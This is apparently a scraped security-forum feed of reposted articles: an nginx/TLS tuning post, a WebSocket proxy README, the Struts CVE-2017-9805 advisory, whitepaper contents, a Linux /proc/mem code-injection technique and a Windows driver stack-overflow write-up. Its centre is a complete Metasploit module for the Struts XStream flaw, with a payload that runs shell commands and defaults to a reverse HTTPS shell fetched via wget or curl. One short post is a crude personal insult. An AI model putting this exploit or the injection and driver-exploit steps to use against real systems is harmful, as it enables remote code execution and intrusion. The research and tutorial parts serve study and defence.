deal with slow clients (incl. malicious slow-POST/slow-read kind of attacks). Application-controlled response buffering through the [X-Accel-Buffering](https://www.nginx.com/resources/wiki/start/topics/examples/x-accel/#x-accel-buffering) header. Whatever path you choose, do not forget to test its effect on both TTFB and TTLB. Also, as mentioned before, buffering can affect IO usage and even backend utilization, so keep an eye out for that too. TLS Now we are going to talk about high-level aspects of TLS and latency improvements that could be done by properly configuring nginx. Most of the optimizations I’ll be mentioning are covered in the High Performance Browser Networking’s “Optimizing for TLS” section and Making HTTPS Fast(er) talk at nginx.conf 2014. Tunings mentioned in this part will affect both performance and security of your web server, if unsure, please consult with Mozilla’s Server Side TLS Guide and/or your Security Team. To verify the results of optimizations you can use: WebpageTest for impact on performance. SSL Server Test from Qualys, or Mozilla TLS Observatory for impact on security. Session resumption As DBAs love to say “the fastest query is the one you never make.” The same goes for TLS—you can reduce latency by one RTT if you cache the result of the handshake. There are two ways of doing that: You can ask the client to store all session parameters (in a signed and encrypted way), and send it to you during the next handshake (similar to a cookie). On the nginx side this is configured via the ssl_session_tickets directive. This does not not consume any memory on the server-side but has a number of downsides: You need the infrastructure to create, rotate, and distribute random encryption/signing keys for your TLS sessions. Just remember that you really shouldn’t 1) use source control to store ticket keys 2) generate these keys from other non-ephemeral material e.g. date or cert. PFS won’t be on a per-session basis but on a per-tls-ticket-key basis, so if an attacker gets a hold of the ticket key, they can potentially decrypt any captured traffic for the duration of the ticket. Your encryption will be limited to the size of your ticket key. It does not make much sense to use AES256 if you are using 128-bit ticket key. Nginx supports both 128 bit and 256 bit TLS ticket keys. Not all clients support ticket keys (all modern browsers do support them though). Or you can store TLS session parameters on the server and only give a reference (an id) to the client. This is done via the ssl_session_cache directive. It has a benefit of preserving PFS between sessions and greatly limiting attack surface. Though ticket keys have downsides: They consume ~256 bytes of memory per session on the server, which means you can’t store many of them for too long. They can not be easily shared between servers. Therefore you either need a loadbalancer which will send the same client to the same server to preserve cache locality, or write a distributed TLS session storage on top off something like [ngx_http_lua_module](https://github.com/openresty/lua-resty-core/blob/master/lib/ngx/ssl/session.md). As a side note, if you go with session ticket approach, then it’s worth using 3 keys instead of one, e.g.: ssl_session_tickets on; ssl_session_timeout 1h; ssl_session_ticket_key /run/nginx-ephemeral/nginx_session_ticket_curr; ssl_session_ticket_key /run/nginx-ephemeral/nginx_session_ticket_prev; ssl_session_ticket_key /run/nginx-ephemeral/nginx_session_ticket_next; You will be always encrypting with the current key, but accepting sessions encrypted with both next and previous keys. OCSP Stapling You should staple your OCSP responses, since otherwise: Your TLS handshake may take longer because the client will need to contact the certificate authority to fetch OCSP status. On OCSP fetch failure may result in availability hit. You may compromise users’ privacy since their browser will contact a third party service indicating that they want to connect to your site. To staple the OCSP response you can periodically fetch it from your certificate authority, distribute the result to your web servers, and use it with the ssl_stapling_file directive: ssl_stapling_file /var/cache/nginx/ocsp/www.der; TLS record size TLS breaks data into chunks called records, which you can’t verify and decrypt until you receive it in its entirety. You can measure this latency as the difference between TTFB from the network stack and application points of view. By default nginx uses 16k chunks, which do not even fit into IW10 congestion window, therefore require an additional roundtrip. Out-of-the box nginx provides a way to set record sizes via ssl_buffer_size directive: To optimize for low latency you should set it to something small, e.g. 4k. Decreasing it further will be more expensive from a CPU usage perspective. To optimize for high throughput you should leave it at 16k. There are two problems with static tuning: You need to tune it manually. You can only set ssl_buffer_size on a per-nginx config or per-server block basis, therefore if you have a server with mixed latency/throughput workloads you’ll need to compromize. There is an alternative approach: dynamic record size tuning. There is an nginx patch from Cloudflare that adds support for dynamic record sizes. It may be a pain to initially configure it, but once you over with it, it works quite nicely. ******TLS 1.3** TLS 1.3 features indeed sound very nice, but unless you have resources to be troubleshooting TLS full-time I would suggest not enabling it, since: It is still a draft. 0-RTT handshake has some security implications. And your application needs to be ready for it. There are still middleboxes (antiviruses, DPIs, etc) that block unknown TLS versions. ## Avoid Eventloop Stalls Nginx is an eventloop-based web server, which means it can only do one thing at a time. Even though it seems that it does all of these things simultaneously, like in time-division multiplexing, all nginx does is just quickly switches between the events, handling one after another. It all works because handling each event takes only couple of microseconds. But if it starts taking too much time, e.g. because it requires going to a spinning disk, latency can skyrocket. If you start noticing that your nginx are spending too much time inside the ngx_process_events_and_timers function, and distribution is bimodal, then you probably are affected by eventloop stalls. # funclatency '/srv/nginx-bazel/sbin/nginx:ngx_process_events_and_timers' -m msecs : count distribution 0 -> 1 : 3799 |****************************************| 2 -> 3 : 0 | | 4 -> 7 : 0 | | 8 -> 15 : 0 | | 16 -> 31 : 409 |**** | 32 -> 63 : 313 |*** | 64 -> 127 : 128 |* | AIO and Threadpools Since the main source of eventloop stalls especially on spinning disks is IO, you should probably look there first. You can measure how much you are affected by it by running fileslower: # fileslower 10 Tracing sync read/writes slower than 10 ms TIME(s) COMM TID D BYTES LAT(ms) FILENAME 2.642 nginx 69097 R 5242880 12.18 0002121812 4.760 nginx 69754 W 8192 42.08 0002121598 4.760 nginx 69435 W 2852 42.39 0002121845 4.760 nginx 69088 W 2852 41.83 0002121854 To fix this, nginx has support for offloading IO to a threadpool (it also has support for AIO, but native AIO in Unixes have lots of quirks, so better to avoid it unless you know what you doing). A basic setup consists of simply: aio threads; aio_write on; For more complicated cases you can set up custom [thread_pool](http://nginx.org/en/docs/ngx_core_module.html#thread_pool)‘s, e.g. one per-disk, so that if one drive becomes wonky, it won’t affect the rest of the requests. Thread pools can greatly reduce the number of nginx processes stuck in D state, improving both latency and throughput. But it won’t eliminate eventloop stalls fully, since not all IO operations are currently offloaded to it. Logging Writing logs can also take a considerable amount of time, since it is hitting disks. You can check whether that’s that case by running ext4slower and looking for access/error log references: # ext4slower 10 TIME COMM PID T BYTES OFF_KB LAT(ms) FILENAME 06:26:03 nginx 69094 W 163070 634126 18.78 access.log 06:26:08 nginx 69094 W 151 126029 37.35 error.log 06:26:13 nginx 69082 W 153168 638728 159.96 access.log It is possible to workaround this by spooling access logs in memory before writing them by using buffer parameter for the access_log directive. By using gzip parameter you can also compress the logs before writing them to disk, reducing IO pressure even more. But to fully eliminate IO stalls on log writes you should just write logs via syslog, this way logs will be fully integrated with nginx eventloop. Open file cache Since open(2) calls are inherently blocking and web servers are routinely opening/reading/closing files it may be beneficial to have a cache of open files. You can see how much benefit there is by looking at ngx_open_cached_file function latency: # funclatency /srv/nginx-bazel/sbin/nginx:ngx_open_cached_file -u usecs : count distribution 0 -> 1 : 10219 |****************************************| 2 -> 3 : 21 | | 4 -> 7 : 3 | | 8 -> 15 : 1 | | If you see that either there are too many open calls or there are some that take too much time, you can can look at enabling open file cache: open_file_cache max=10000; open_file_cache_min_uses 2; open_file_cache_errors on; After enabling open_file_cache you can observe all the cache misses by looking at opensnoop and deciding whether you need to tune the cache limits: # opensnoop -n nginx PID COMM FD ERR PATH 69435 nginx 311 0 /srv/site/assets/serviceworker.js 69086 nginx 158 0 /srv/site/error/404.html ... Wrapping up All optimizations that were described in this post are local to a single web server box. Some of them improve scalability and performance. Others are relevant if you want to serve requests with minimal latency or deliver bytes faster to the client. But in our experience a huge chunk of user-visible performance comes from a more high-level optimizations that affect behavior of the Dropbox Edge Network as a whole, like ingress/egress traffic engineering and smarter Internal Load Balancing. These problems are on the edge (pun intended) of knowledge, and the industry has only just started approaching them. If you’ve read this far you probably want to work on solving these and other interesting problems! You’re in luck: Dropbox is looking for experienced SWEs, SREs, and Managers. Sursa: https://blogs.dropbox.com/tech/2017/09/optimizing-web-servers-for-high-throughput-and-low-latency/3 points
-
2 points
-
WSSiP: A WebSocket Manipulation Proxy Short for "WebSocket/Socket.io Proxy", this tool, written in Node.js, provides a user interface to capture, intercept, send custom messages and view all WebSocket and Socket.IO communications between the client and server. Upstream proxy support also means you can forward HTTP/HTTPS traffic to an intercepting proxy of your choice (e.g. Burp Suite or Pappy Proxy) but view WebSocket traffic in WSSiP. More information can be found on the blog post. There is an outward bridge via HTTP to write a fuzzer in any language you choose to debug and fuzz for security vulnerabilities. See Fuzzing for more details. Written and maintained by Samantha Chalker (@thekettu). Icon for WSSiP release provided by @dragonfoxing. Installation From Packaged Application See Releases. From npm/yarn (for CLI commands) Run the following in your command line: npm: # Install Electron globally npm i -g electron@1.7 # Install wssip global for "wssip" command npm i -g wssip # Launch! wssip yarn: (Make sure the directory in yarn global bin is in your PATH) yarn global add electron@1.7 yarn global add wssip wssip You can also run npm install electron (or yarn add electron) inside the installed WSSiP directory if you do not want to install Electron globally, as the app packager requires Electron be added to developer dependencies. From Source Using a command line: # Clone repository locally git clone https://github.com/nccgroup/wssip # Change to the directory cd wssip # If you are developing for WSSiP: # npm i # If not... (as to minimize disk space): npm i electron@1.7 npm i --production # Start application: npm start Usage Open the WSSiP application. WSSiP will start listening automatically. This will default to localhost on port 8080. Optionally, use Tools > Use Upstream Proxy to use another intercepting proxy to view web traffic. Configure the browser to point to http://localhost:8080/ as the HTTP Proxy. Navigate to a page using WebSockets. A good example is the WS Echo Demonstration. ??? Potato. Fuzzing WSSiP provides an HTTP bridge via the man-in-the-middle proxy for custom applications to help fuzz a connection. These are accessed over the proxy server. A few of the simple CA certificate downloads are: http://mitm/ca.pem / http://mitm/ca.der (Download CA Certificate) http://mitm/ca_pri.pem / http://mitm/ca_pri.der (Download Private Key) http://mitm/ca_pub.pem / http://mitm/ca_pub.der (Download Public Key) Get WebSocket Connection Info Returns whether the WebSocket id is connected to a web server, and if so, return information. URL GET http://mitm/ws/:id URL Params id=[integer] Success Response (Not Connected) Code: 200 Content: {connected: false} Success Response (Connected) Code: 200 Content: {connected: true, url: 'ws://echo.websocket.org', bytesReceived: 0, extensions: {}, readyState: 3, protocol: '', protocolVersion: 13} Send WebSocket Data Send WebSocket data. URL POST http://mitm/ws/:id/:sender/:mode/:type?log=:log URL Params Required: id=[integer] sender one of client or server mode one of message, ping or pong type one of ascii or binary (text is an alias of ascii) Optional: log either true or y to log in the WSSiP application. Errors will be logged in the WSSiP application instead of being returned via the REST API. Data Params Raw data in the POST field will be sent to the WebSocket server. Success Response: Code: 200 Content: {success: true} Error Response: Code: 500 Content: {success: false, reason: 'Error message'} Development Pull requests are welcomed and encouraged. WSSiP supports the debug npm package, and setting the environment variable DEBUG=wssip:* will output debug information to console. There are two commands depending on how you want to compile the Webpack bundle: for development, that is npm run compile:dev and for production is npm run compile. React will also log errors depending on whether development or production is specified. Currently working on: Exposed API for external scripts for fuzzing (99% complete, it is live but need to test more data) Saving/Resuming Connections from File (35% complete, exporting works sans active connections) Using WSSiP in browser without Electron (likely 1.1.0) Rewrite in TypeScript (likely 1.2.0) Using something other than Appbar for Custom/Intercept tabs, and styling the options to center better For information on using the mitmengine class, see: npm, yarn, or mitmengine/README.md Sursa: https://github.com/nccgroup/wssip2 points
-
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'Apache Struts 2 REST Plugin XStream RCE', 'Description' => %q{ The REST Plugin is using a XStreamHandler with an instance of XStream for deserialization without any type filtering and this can lead to Remote Code Execution when deserializing XML payloads. }, 'Author' => [ 'Man Yue Mo', # Vuln 'caiqiiqi', # PoC 'wvu' # Module ], 'References' => [ ['CVE', '2017-9805'], ['URL', 'https://struts.apache.org/docs/s2-052.html'], ['URL', 'https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement'], ['URL', 'http://blog.csdn.net/caiqiiqi/article/details/77861477'] ], 'DisclosureDate' => 'Sep 5 2017', 'License' => MSF_LICENSE, 'Platform' => ['unix', 'linux', 'win'], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Privileged' => false, 'Targets' => [ ['Apache Struts 2.5 - 2.5.12', {}] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter_reverse_https', 'CMDSTAGER::FLAVOR' => 'wget' }, 'CmdStagerFlavor' => ['wget', 'curl'] )) register_options([ Opt::RPORT(8080), OptString.new('TARGETURI', [true, 'Path to Struts app', '/struts2-rest-showcase/orders/3']) ]) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => target_uri.path ) if res && res.code == 200 CheckCode::Detected else CheckCode::Safe end end def exploit execute_cmdstager end def execute_command(cmd, opts = {}) send_request_cgi( 'method' => 'POST', 'uri' => target_uri.path, 'ctype' => 'application/xml', 'data' => xml_payload(cmd) ) end def xml_payload(cmd) # xmllint --format <<EOF <map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>/bin/sh</string><string>-c</string><string>#{cmd}</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer/> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> </entry> </map> EOF end end Sursa: https://raw.githubusercontent.com/wvu-r7/metasploit-framework/5ea83fee5ee8c23ad95608b7e2022db5b48340ef/modules/exploits/multi/http/struts2_rest_xstream.rb2 points
-
Security researchers at lgtm.com have discovered a critical remote code execution vulnerability in Apache Struts — a popular open-source framework for developing web applications in the Java programming language. All versions of Struts since 2008 are affected; all web applications using the framework’s popular REST plugin are vulnerable. Users are advised to upgrade their Apache Struts components as a matter of urgency. This vulnerability has been addressed in Struts version 2.5.13. lgtm provides free software engineering analytics for open-source projects; at the time this post is published, over 50,000 projects are continuously monitored. Anyone can write their own analyses; ranging from checks for enforcing good coding practices to advanced analyses to find security vulnerabilities. The lgtm security team actively helps the open-source community to uncover critical security vulnerabilities in OSS projects. This particular vulnerability allows a remote attacker to execute arbitrary code on any server running an application built using the Struts framework and the popular REST communication plugin. The weakness is caused by the way Struts deserializes untrusted data. The lgtm security team have a simple working exploit for this vulnerability which will not be published at this stage. At the time of the announcement there is no suggestion that an exploit is publicly available, but it is likely that there will be one soon. The Apache Struts development team have confirmed the severity of this issue and released a patch today: The Struts maintainers have posted an announcement on their website and the vulnerability has been assigned CVE 2017-9805. More information about how this vulnerability was found using lgtm.com is available in a separate blog post. Analyst Fintan Ryan at RedMonk estimates that at least 65% of the Fortune 100 companies are actively using web applications built with the Struts framework. Organizations like Lockheed Martin, the IRS, Citigroup, Vodafone, Virgin Atlantic, Reader’s Digest, Office Depot, and SHOWTIME are known to have developed applications using the framework. This illustrates how widespread the risk is. When asked for a comment, the Chief Information Security Officer of a Tier 1 bank confirmed that Struts is still used in large numbers of applications and that this finding poses a real threat: Man Yue Mo, one of the lgtm security researchers who discovered this vulnerability, confirms the criticality: He has written a blog post that describes in more detail how he found this particular vulnerability using the flexible and powerful query language at the heart of lgtm. The lgtm queries flag up software problems and security vulnerabilities on a daily basis. The analysis results for a large number of projects is readily available on lgtm.com, including for popular projects like Hadoop, Jetty, Maven, and Storm — all of which have millions of users, and are the building blocks of famous platforms like Twitter, Spotify, Google, and Amazon. Oege de Moor, CEO and founder of Semmle (the company behind lgtm): The technology that powers lgtm is used by many organizations to analyze their software development process and find security vulnerabilities like the one in Struts. These organizations include: Source: https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement2 points
-
E aceeasi zdreanta de aici -> https://rstforums.com/forum/topic/106302-phphtml/?tab=comments#comment-653465. Proaste puli o fost la curu' lu' ma-sa.2 points
-
Da, momentan pwn este aproape finalizat si testat de noi ( @SilenTx0 inca lucreaza la ceva tutoriale). Peste putin timp o sa puteti sa accesati versiunea beta.2 points
-
Linux based inter-process code injection without ptrace(2) Tuesday, September 5, 2017 at 5:01AM Using the default permission settings found in most major Linux distributions it is possible for a user to gain code injection in a process, without using ptrace. Since no syscalls are required using this method, it is possible to accomplish the code injection using a language as simple and ubiquitous as Bash. This allows execution of arbitrary native code, when only a standard Bash shell and coreutils are available. Using this technique, we will show that the noexec mount flag can be bypassed by crafting a payload which will execute a binary from memory. The /proc filesystem on Linux offers introspection of the running of the Linux system. Each process has its own directory in the filesystem, which contains details about the process and its internals. Two pseudo files of note in this directory are maps and mem. The maps file contains a map of all the memory regions allocated to the binary and all of the included dynamic libraries. This information is now relatively sensitive as the offsets to each library location are randomised by ASLR. Secondly, the mem file provides a sparse mapping of the full memory space used by the process. Combined with the offsets obtained from the maps file, the mem file can be used to read from and write directly into the memory space of a process. If the offsets are wrong, or the file is read sequentially from the start, a read/write error will be returned, because this is the same as reading unallocated memory, which is inaccessible. The read/write permissions on the files in these directories are determined by the ptrace_scope file in /proc/sys/kernel/yama, assuming no other restrictive access controls are in place (such as SELinux or AppArmor). The Linux kernel offers documentation for the different values this setting can be set to. For the purposes of this injection, there are two pairs of settings. The lower security settings, 0 and 1, allow either any process under the same uid, or just the parent process, to write to a processes /proc/${PID}/mem file, respectively. Either of these settings will allow for code injection. The more secure settings, 2 and 3, restrict writing to admin-only, or completely block access respectively. Most major operating systems were found to be configured with ‘1’ by default, allowing only the parent of a process to write into its /proc/${PID}/mem file. This code injection method utilises these files, and the fact that the stack of a process is stored inside a standard memory region. This can be seen by reading the maps file for a process: $ grep stack /proc/self/maps 7ffd3574b000-7ffd3576c000 rw-p 00000000 00:00 0 [stack] Among other things, the stack contains the return address (on architectures that do not use a ‘link register’ to store the return address, such as ARM), so a function knows where to continue execution when it has completed. Often, in attacks such as buffer overflows, the stack is overwritten, and the technique known as ROP is used to assert control over the targeted process. This technique replaces the original return address with an attacker controlled return address. This will allow an attacker to call custom functions or syscalls by controlling execution flow every time the ret instruction is executed. This code injection does not rely on any kind of buffer overflow, but we do utilise a ROP chain. Given the level of access we are granted, we can directly overwrite the stack as present in /proc/${PID}/mem. Therefore, the method uses the /proc/self/maps file to find the ASLR random offsets, from which we can locate functions inside a target process. With these function addresses we can replace the normal return addresses present on the stack and gain control of the process. To ensure that the process is in an expected state when we are overwriting the stack, we use the sleep command as the slave process which is overwritten. The sleep command uses the nanosleep syscall internally, which means that the sleep command will sit inside the same function for almost its entire life (excluding setup and teardown). This gives us ample opportunity to overwrite the stack of the process before the syscall returns, at which point we will have taken control with our manufactured chain of ROP gadgets. To ensure that the location of the stack pointer at the time of the syscall execution, we prefix our payload with a NOP sled, which will allow the stack pointer to be at almost any valid location, which upon return will just increase the stack pointer until it gets to and executes our payload. A general purpose implementation for code injection can be found at https://github.com/GDSSecurity/Dunkery. Efforts were made to limit the external dependencies of this script, as in some very restricted environments utility binaries may not be available. The current list of dependencies are: GNU grep (Must support -Fao --byte-offset) dd (required for reading/writing to an absolute offset into a file) Bash (for the math and other advanced scripting features) The general flow of this script is as follows: Launch a copy of sleep in the background and record its process id (PID). As mentioned above, the sleep command is an ideal candidate for injection as it only executes one function for its whole life, meaning we won’t end up with unexpected state when overwriting the stack. We use this process to find out which libraries are loaded when the process is instantiated. Using /proc/${PID}/maps we try to find all the gadgets we need. If we can’t find a gadget in the automatically loaded libraries we will expand our search to system libraries in /usr/lib. If we then find the gadget in any other library we can load that library into our next slave using LD_PRELOAD. This will make the missing gadgets available to our payload. We also verify that the gadgets we find (using a naive ‘grep’) are within the .text section of the library. If they are not, there is a risk they will not be loaded in executable memory on execution, causing a crash when we try to return to the gadget. This ‘preload’ stage should result in a possibly empty list of libraries containing gadgets missing from the standard loaded libraries. Once we have confirmed all gadgets can be available to us, we launch another sleep process, LD_PRELOADing the extra libraries if necessary. We now re-find the gadgets in the libraries, and we relocate them to the correct ASLR base, so we know their location in the memory space of the target region, rather than just the binary on disk. As above, we verify that the gadget is in an executable memory region before we commit to using it. The list of gadgets we require is relatively short. We require a NOP for the above discussed NOP sled, enough POP gadgets to fill all registers required for a function call, a gadget for calling a syscall, and a gadget for calling a standard function. This combination will allow us to call any function or syscall, but does not allow us to perform any kind of logic. Once these gadgets have been located, we can convert pseudo instructions from our payload description file into a ROP payload. For example, for a 64bit system, the line ‘syscall 60 0’ will convert to ROP gadgets to load ‘60’ into the RAX register, ‘0’ into RDI, and a syscall gadget. This should result in 40 bytes of data: 3 addresses and 2 constants, all 8 bytes. This syscall, when executed, would call exit(0). We can also call functions present in the PLT, which includes functions imported from external libraries, such as glibc. To locate the offsets for these functions, as they are called by pointer rather than syscall number, we need to first parse the ELF section headers in the target library to find the function offset. Once we have the offset we can relocate these as with the gadgets, and add them to our payload. String arguments have also been handled, as we know the location of the stack in memory, so we can append strings to our payload and add pointers to them as necessary. For example, the fexecve syscall requires a char** for the arguments array. We can generate the array of pointers before injection inside our payload and upon execution the pointer on the stack to the array of pointers can be used as with a normal stack allocated char**. Once the payload has been fully serialized, we can overwrite the stack inside the process using dd, and the offset to the stack obtained from the /proc/${PID}/maps file. To ensure that we do not encounter any permissions issues, it is necessary for the injection script to end with the ‘exec dd’ line, which replaces the bash process with the dd process, therefore transferring parental ownership over the sleep program from bash to dd. After the stack has been overwritten, we can then wait for the nanosleep syscall used by the sleep binary to return, at which point our ROP chain gains control of the application and our payload will be executed. The specific payload to be injected as a ROP chain can reasonably be anything that does not require runtime logic. The current payload in use is a simple open/memfd_create/sendfile/fexecve program. This disassociates the target binary with the filesystem noexec mount flag, and the binary is then executed from memory, bypassing the noexec restriction. Since the sleep binary is backgrounded on execution by bash, it is not possible to interact with the binary to be executed, as it does not have a parent after dd exits. To bypass this restriction, it is possible to use one of the examples present in the libfuse distribution, assuming fuse is present on the target system: the passthrough binary will create a mirrored mount of the root filesystem to the destination directory. This new mount is not mounted noexec, and therefore it is possible to browse through this new mount to a binary, which will then be executable. A proof of concept video shows this passthrough payload allowing execution of a binary in the current directory, as a standard child of the shell. Future work: To speed up execution, it would be useful to cache the gadget offset from its respective ASLR base between the preload and the main run. This could be accomplished by dumping an associative array to disk using declare -p, but touching disk is not necessarily always appropriate. Alternatives include rearchitecting the script to execute the payload script in the same environment as the main bash process, rather than a child executed using $(). This would allow for the sharing of environmental variables bidirectionally. Limit the external dependencies further by removing the requirement for GNU grep. This was previously attempted and deemed too slow when finding gadgets, but may be possible with more optimised code. The obvious mitigation strategy for this technique is to set ptrace_scope to a more restrictive value. A value of 2 (superuser only) is the minimum that would block this technique, whilst not completely disabling ptrace on the system, but care should be taken to ensure that ptrace as a normal user is not in use. This value can be set by adding the following line to /etc/sysctl.conf: kernel.yama.ptrace_scope=2 Other mitigation strategies include combinations of Seccomp, SELinux or Apparmor to restrict the permissions on sensitive files such as /proc/${PID}/maps or /proc/${PID}/mem. The proof of concept code, and Bash ROP generator can be found at https://github.com/GDSSecurity/Cexigua Rory McNamara Sursa: https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html1 point
-
1 point
-
TABLE OF CONTENTS 1 ABSTRACT_______________________________________________________________ 5 2 INTRODUCTION___________________________________________________________ 6 3 RELATED WORK __________________________________________________________ 8 4 BACKGROUND ___________________________________________________________ 9 4.1 Security Protocols 9 4.2 ISIM Authenticate 10 4.3 IP Multimedia Subsystem 10 5 PRACTICAL ATTACKS ____________________________________________________ 12 5.1 A1: Sniffing VoLTE/VoWiFi Interfaces 12 5.2 A2: ISIM sniffing for extracting CK/IK 13 5.3 A3: User location manipulation 16 5.4 A4: Roaming information manipulation 16 5.5 A5: Side channel attack 16 6 RESULTS _______________________________________________________________ 18 6.1 R1: Information Disclosures 18 6.2 R2.1: Keys in GSM SIM 20 6.3 R2.2: Authentication using IK 20 6.4 R3: User Location Manipulation 21 6.5 R4: Roaming Information Manipulation 22 6.6 R5: Side channel 22 7 MITIGATION _____________________________________________________________ 23 8 CONCLUSION ____________________________________________________________ 24 9 REFERENCES ____________________________________________________________ 25 Download: https://www.ernw.de/download/newsletter/ERNW_Whitepaper_60_Practical_Attacks_On_VoLTE_And_VoWiFi_v1.0.pdf1 point
-
1 point
-
Contents Understanding the Risk.............................................................................................................. 3 Communication.......................................................................................................................... 5 Transport Layer Security (TLS) .............................................................................................. 5 Certificate Pinning .................................................................................................................. 6 Data Storage.............................................................................................................................. 9 Binary Protections.....................................................................................................................14 Obfuscation ...........................................................................................................................15 Root/Jailbreak Detection .......................................................................................................15 Debug Protection...................................................................................................................17 Hook Detection......................................................................................................................18 Runtime Integrity Checks.......................................................................................................20 Attacker Effort ...........................................................................................................................21 Grading Applications.................................................................................................................22 Download: http://file.digitalinterruption.com/Secure Mobile Development.pdf1 point
-
HEVD Stack Overflow GS Posted on September 5, 2017 Lately, I've decided to play around with HackSys Extreme Vulnerable Driver (HEVD) for fun. It's a great way to familiarize yourself with Windows exploitation. In this blog post, I'll show how to exploit the stack overflow that is protected with /GS stack cookies on Windows 7 SP1 32 bit. You can find the source code here. It has a few more exploits written and a Win10 pre-anniversary version of the regular stack buffer overflow vulnerability. Triggering the Vulnerable Function To start, we need to find the ioctl dispatch routine in HEVD. Looking for theIRP_MJ_DEVICE_CONTROL IRP, we see that the dispatch function can be found at hevd+508e. kd> !drvobj hevd 2 Driver object (852b77f0) is for: \Driver\HEVD DriverEntry: 995cb129 HEVD DriverStartIo: 00000000 DriverUnload: 995ca016 HEVD AddDevice: 00000000 Dispatch routines: [00] IRP_MJ_CREATE 995c9ff2 HEVD+0x4ff2 [01] IRP_MJ_CREATE_NAMED_PIPE 995ca064 HEVD+0x5064 ... [0e] IRP_MJ_DEVICE_CONTROL 995ca08e HEVD+0x508e [0f] IRP_MJ_INTERNAL_DEVICE_CONTROL 995ca064 HEVD+0x5064 [10] IRP_MJ_SHUTDOWN 995ca064 HEVD+0x5064 [11] IRP_MJ_LOCK_CONTROL 995ca064 HEVD+0x5064 [12] IRP_MJ_CLEANUP 995ca064 HEVD+0x5064 [13] IRP_MJ_CREATE_MAILSLOT 995ca064 HEVD+0x5064 [14] IRP_MJ_QUERY_SECURITY 995ca064 HEVD+0x5064 [15] IRP_MJ_SET_SECURITY 995ca064 HEVD+0x5064 ... Finding the ioctl request number requires very light reverse engineering. We want to end up eventually at hevd+515a. At hevd+50b4, the request number is subtracted by 222003h. If it was 222003h, then jump to hevd+5172, or else fall through to hevd+50bf. In this basic block, our ioctl request number is subtracted by 4. If the result is 0, we are where we want to be. Therefore, our ioctl number should be 222007h. Eventually, a memcpy is reached where the calling function does not check the copy size. To give the overflow code a quick run, we call it with benign input using the code below. You can find the implementation of mmap and write in the full source code. def trigger_stackoverflow_gs(addr, size): dwReturn = c_ulong() driver_handle = kernel32.CreateFileW(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) if not driver_handle or driver_handle == -1: sys.exit() print "[+] IOCTL: 0x222007" dev_ioctl = kernel32.DeviceIoControl(driver_handle, 0x222007, addr, size, None, 0, byref(dwReturn), None) m = mmap() write(m, 'A'*10) trigger_stackoverflow_gs(m, 10) In WinDbg, the debug output confirms that we are calling the right ioctl. From the figure, we can see that the kernel buffer is 0x200 in size so if we run a PoC again, but with 0x250 As, we should overflow the stack cookie and blue screens our VM. Indeed, the bugcheck tells us that the system crashed due to a stack buffer overflow. Stack cookies in Windows are first XORed with ebp before they're stored on the stack. If we take the cookie in the bugcheck, and XOR it with 41414141, the result should resemble a stack address. Specifically, it should be the stack base pointer for hevd+48da. kd> ? e9d25b91 ^ 41414141 Evaluate expression: -1466754352 = a8931ad0 Bypassing Stack Cookies A common way to bypass stack cookies, introduced by David Litchfield, is to cause the program to throw an exception before the stack cookie is checked at the end of the function. This works because when an exception occurs, the stack cookie is not checked. There are two ways [generating an exception] might happen--one we can control and the other is dependent of the code of the vulnerable function. In the latter case, if we overflow other data, for example parameters that were pushed onto the stack to the vulnerable function and these are referenced before the cookie check is performed then we could cause an exception here by setting this data to something that will cause an exception. If the code of the vulnerable function has been written in such a way that no opportunity exists to do this, then we have to attempt to generate our own exception. We can do this by attempting to write beyond the end of the stack. For us, it's easy because the vulnerable function uses memcpy. We can simply force memcpy to segfault by letting it continue copying the source buffer all the way to unmapped memory. I use my mmap function to map two adjacent pages, then munmap to unmap the second page. mmap and munmap are just simple wrappers I wrote for NtAllocateVirtualMemoryand NtFreeVirtualMemory respectively. The idea is to place the source buffer at the end of the mapped page that was mapped, and have the vulnerable memcpy read off into the unmapped page to cause an exception. To test this, we'll use the PoC code below. m = mmap(size=0x2000) munmap(m+0x1000) trigger_stackoverflow_gs(m+0x1000-0x250, 0x251) Back in the debugger, we can observe that an exception was thrown and eip was overwritten as a result of the exception handler being overwritten. The next step is to find the offset of the As so we can control eip to point to shellcode. You can use a binary search type way to find the offset, but an easier method is to use a De Bruijn sequence as the payload. I usually use Metasploit's pattern_create.rb andpattern_offset.rb for finding the exact offset in my buffer. The figure above shows us 41367241 overwrites the exception handler address and so also eip. kd> .formats 41367241 Evaluate expression: Hex: 41367241 Decimal: 1094087233 Octal: 10115471101 Binary: 01000001 